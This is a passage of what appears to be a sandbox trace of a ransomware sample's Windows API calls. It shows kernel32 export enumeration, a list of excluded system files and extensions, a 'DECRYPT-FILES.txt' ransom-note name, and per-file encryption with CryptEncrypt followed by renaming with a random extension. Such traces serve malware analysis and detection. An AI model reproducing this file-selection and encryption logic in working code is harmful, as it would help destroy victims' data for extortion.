(in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.212] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.212] lstrlenA (lpString="DELETEATOM") returned 10 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.212] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.212] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.212] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.212] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.212] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.212] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.212] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.212] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.213] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.213] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.213] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.213] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.213] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.213] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.213] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.213] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.213] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.213] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.213] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.214] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.214] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.214] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.214] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.214] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.214] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.214] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.214] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.214] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.214] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.214] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.214] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.214] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.214] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.214] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.214] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.214] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.214] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.214] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.214] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.215] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.215] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.215] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.215] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.215] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.215] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.215] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.215] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt") returned 115 [0079.215] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli") returned 122 [0079.215] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.xoaili"), dwFlags=0x0) returned 1 [0079.216] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.216] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.216] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.216] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54cce0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54cce0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54cce0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@api.bing[2].txt", cAlternateFileName="5P40FC~1.TXT")) returned 1 [0079.216] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.216] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="autorun.inf") returned -1 [0079.217] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="boot.ini") returned -1 [0079.217] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="desktop.ini") returned -1 [0079.217] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="ntuser.dat") returned -1 [0079.217] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="iconcache.db") returned -1 [0079.217] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="bootsect.bak") returned -1 [0079.217] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="ntuser.dat.log") returned -1 [0079.217] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="thumbs.db") returned -1 [0079.217] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt", lpString2="Bootfont.bin") returned -1 [0079.217] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@api.bing[2].txt") returned 36 [0079.217] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.217] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.217] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.217] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.217] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@api.bing[2].txt") returned 36 [0079.217] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.217] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@api.bing[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" [0079.217] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.217] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.218] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=221) returned 1 [0079.218] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.218] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.218] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.218] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.219] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.220] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.220] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.221] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.221] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.221] CloseHandle (hObject=0x464) returned 1 [0079.221] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.221] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.222] CloseHandle (hObject=0x0) returned 0 [0079.222] CloseHandle (hObject=0x460) returned 1 [0079.223] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.223] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.223] GetTickCount () returned 0x114c4c6 [0079.223] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.224] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.224] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.224] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.224] lstrlenA (lpString="kernel32.dll") returned 12 [0079.224] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.225] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.225] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.225] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.225] lstrlenA (lpString="ADDATOMA") returned 8 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.225] lstrlenA (lpString="ADDATOMW") returned 8 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.225] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.225] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.225] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.225] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.225] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.225] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.225] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.225] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.225] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.225] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.225] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.225] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.225] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.226] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.226] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.226] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.226] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.226] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.226] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.226] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.226] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.226] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.226] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.226] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.226] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.226] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.226] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.226] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.226] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.226] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.226] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.227] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.227] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.227] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.227] lstrlenA 